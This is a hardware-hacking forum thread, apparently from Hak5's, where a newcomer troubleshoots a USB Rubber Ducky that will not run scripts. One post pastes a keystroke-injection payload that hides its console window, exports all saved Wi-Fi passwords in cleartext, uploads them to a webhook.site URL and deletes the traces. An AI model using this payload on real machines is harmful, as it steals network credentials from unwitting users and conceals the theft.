Jump to content

new Rubber Duck problems


Recommended Posts

Hi all

Im brand new here and have placed a order and received  my Rubber Ducky from Hak5.

No i try to let it work but if i place a Bin file on my SD it dont work.

Also i tryd the Help page from here, with the test .bin but even than the ducky dont do anything. 

Red light still on and no action.

Can some one help me a bit on this ?


Great thnx and Greets

Link to comment
Share on other sites

12 hours ago, chrizree said:

Have you tried to reformat the SD card? Tried some other SD card? The bin file is a binary file, nothing strange with the fact that it looks like that.

YEAH I FORMAT the sd card, it was a sdcard that Hak5 sended with the ducky also. so i raely dont know what to do


Link to comment
Share on other sites

Just now, chrizree said:

ok, but do you have any other SD card (not the one you got from Hak5) that you can try?

i tryed a few sd cards. and format them to fat, with the tool SD card formater. 

Also when i make a easy script with rubberduckytoolkit.com nothing happend, and still red flashlight.

Link to comment
Share on other sites

1 hour ago, chrizree said:

Not sure what rubberduckytoolkit.com is, can't reach it either, perhaps you mean ducktoolkit.com... I would suggest using JS Ducky Encoder instead that can be downloaded from the Hak5 downloads web site https://downloads.hak5.org/ducky

ok i ised JS duck on a new SD.

I use the wifi script and JS duck give me the green, so the script was ok.

On my SD card in the Rubber Ducky nothing happend.

Here the script, and also i had the webhooksite online


  Following payload will grab saved Wifi password and will send them to your hosted webhook and hide the cmd windows by using technique mentioned in hak5darren
 rubberducky wiki -- Payload hide cmd window [https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---hide-cmd-window]

#include "DigiKeyboard.h"
#define KEY_DOWN 0x51 // Keyboard Down Arrow
#define KEY_ENTER 0x28 //Return/Enter Key

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 

void loop() {
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu  
  DigiKeyboard.sendKeyStroke(KEY_M); //goto Move
  for(int i =0; i < 100; i++)
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.println("cd %temp%"); //going to temporary dir
  DigiKeyboard.println("netsh wlan export profile key=clear"); //grabbing all the saved wifi passwd and saving them in temporary dir
  DigiKeyboard.println("powershell Select-String -Path Wi-Fi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS"); //Extracting all password and saving them in Wi-Fi-Pass file in temporary dir
  DigiKeyboard.println("powershell Invoke-WebRequest -Uri https://webhook.site/13b4c5d2-7ad1-4cab-a421-75c692fd85c4 -Method POST -InFile Wi-Fi-PASS"); //Submitting all passwords on hook
  DigiKeyboard.println("del Wi-Fi* /s /f /q"); //cleaning up all the mess
  digitalWrite(1, HIGH); //turn on led when program finishes
  digitalWrite(1, LOW); 

Link to comment
Share on other sites

Hi, thnx for this.

I just made a new script with a youtube video, just a simpel script to open a notepad and write something.

Now when i put my Rubberduck inside it flash red and green, whats wrong now?

It does more than befor... but no notepad comes up.

Link to comment
Share on other sites

hi, this script i used.

I got it from davidbombal/hak5

I also twinflashed the Ducky? maybe that was wrong?

Im sorry im a bit new in all this , i understand allot but not everything.


What happend after the flash, my ducky opening just like a normal usb with a bin file. 

REM Script 1:
  REM =========
  REM ~~ | Open Notepad and write something:
  DELAY 1000
  GUI r
  DELAY 100
  STRING notepad.exe
  DELAY 1000

STRING You have been hacked


Link to comment
Share on other sites

ok, I'm not familiar with alternative firmwares, just the stock one coming with the Ducky (if I want such features, I use other Hak5 devices or alternative hardware solutions), no idea why it shows up as an ordinary USB drive, probably a feature of the alternative firmware, someone else might have an explanation to why this is happening, the script looks fairly standard though, more or less a copy of the example that is on the Hak5 Docs website

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...